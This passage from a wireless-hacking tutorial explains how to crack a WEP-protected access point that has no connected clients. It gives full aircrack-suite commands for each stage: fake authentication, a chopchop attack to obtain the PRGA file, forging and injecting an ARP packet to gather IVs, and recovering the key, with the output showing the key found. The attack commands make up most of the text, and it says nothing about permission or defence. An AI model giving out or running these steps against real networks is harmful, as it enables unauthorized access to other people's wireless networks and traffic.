Let’s see now how to get access if no one is connected to the Network.
This type of attack is only successful when we get some packets from the wired side of the network. I mean it’s true that there are no clients connected over wireless, however the AP has RJ45 ports and we need to get some traffic from there. Why?
Well, if there is no traffic there is no way possible to create traffic. You can try but the AP will deduce that anyone is broadcasting traffic, but the client it’s not connected to the network and the AP will throw away those packets and send a deauthentication packet to that fake client.
However if we get some packets from the wired side and using either a chopchop attack or a fragmentation attack we can get a fragment, which is a .xor file that contains useful information that we could use to create an a packet to broadcast to the AP and it will provoke the AP to answer with new packets (IVs).
That fake packet is received successfully by the AP because it sees that the information contained on that packet is valid.
After we create that legit packet and injecting it in the air you will be able to resume the attack as we did before using a client connected. When we got enough IVs, it’s time to crack the password.
So, let’s get started. First, put the wireless card in monitor mode. You know the drill:
#airmon-ng start wlan0
Then use:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 wlan0
By now you don’t really need to use the “-w” parameter because you might get few packets. It’s up to you.
Let’s now associate with an access point, using a fake authentication:
#aireplay-ng -1 0 -e WLAN -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0
-1 means fake authentication attack
0 means the fake authentication attack won’t stop until its succeeded -e WLAN is the wireless SSID
37
-a 00:80:5A:28:B5:AB is the access point MAC address -h 74:EA:3A:90:C7:21 is our card MAC address
So I succeeded to perform a fake authentication into the AP.
Now I need to obtain the PRGA (Pseudo Random Generation Algorithm) file.
To obtain it we will need to perform a chopchop attack or a fragmentation attack.
This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.
Either chopchop or fragmentation attacks can be used to obtain the PRGA bit file. The result is the same, so use one of them, it doesn’t really matter which one you used.
I will cover the chopchop technique. Start another console session and run:
#aireplay-ng -4 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 wlan0
-4 means the chopchop attack
-b 00:80:5A:28:B5:AB is the access point MAC address
-h 74:EA:3A:90:C7:21 is the MAC address of our card and must match the MAC used in the fake authentication
wlan0 is the wireless interface name
38
So after you perform a fake authentication you need to wait until you get a packet to perform an attack, I kept a console window performing fake authentications at every second as you can see, so I don’t get deauthenticated by any reason and another one with the chopchop attack waiting for a packet to start.
When the console asks you “Use this packet?” press “y” and then ENTER to start the chopchop attack.
Wait a few seconds for the chopchop attack to make its magic. The file “replay_dec-0917-223734.xor” as you can see above can now be used in the next step to generate an Arp packet.
39
The objective is to have the access point rebroadcast the injected Arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.
Use the following command:
#packetforge-ng -0 -a 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0917-223734.xor -w arp-request
-0 means generate an arp packet
-a 00:80:5A:28:B5:AB is the access point MAC address -h 74:EA:3A:90:C7:21 is MAC address of our card
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255) -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255) -y replay_dec-0917-223734.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to
The system will respond: “Wrote packet to: arp-request”
Let’s close the console running airodump-ng and open a new one and start airodump-ng again. This time you need to add the “-w” parameter so we can save the IVs we will generate to a file. If you used it already in the first one then you don’t need to close it.
So use airodump-ng like this:
#airodump-ng --bssid 00:80:5A:28:B5:AB -c 11 -w wepkey wlan0
Let’s call that file, wepkey.
On the console window you used to create the packet use this command:
#aireplay-ng -2 -b 00:80:5A:28:B5:AB -h 74:EA:3A:90:C7:21 -r arp-request wlan0
After you start injecting arp requests from the packet you just created, the cracking process will be just like cracking WEP with a previous associated client.
This will inject the packet we created in the air. After that the system will ask you if you want to use that packet, press “y” and ENTER to start injecting arp requests.
40
As you can see now we are getting a lot of data (IVs).
Remember once again, when you get around 50 000 IVs you have a good chance of crack the network.
Don’t worry if you fail, try again with more IVs. Remember that you’ll need more IVs depending on how big is the key. There is no way to determine the size of the key so try with 50 000 if you fail try with 200 000 and if you fail get more, and you’ll get there.
The point here is that you are doing it the right way if you fail is for bad luck and not because you’re doing it wrong.
All of the captured data packets containing IVs are stored in the file that I called wepkey outputted by airodump-ng. The program will write multiple files to the active directory in different formats, but we are looking for .cap files.
Airodump-ng creates more than one .cap file, I mean it creates 01.cap, wepkey-02.cap…
So, when you’re ready, use the command:
#aircrack-ng -b 00:80:5A:28:B5:AB wepkey*.cap
41
So as you can see it found the WEP key of the network. The key I used for this example was “1234567890” and as you see in aircrack-ng output “KEY FOUND!
[12:34:56:78:90]”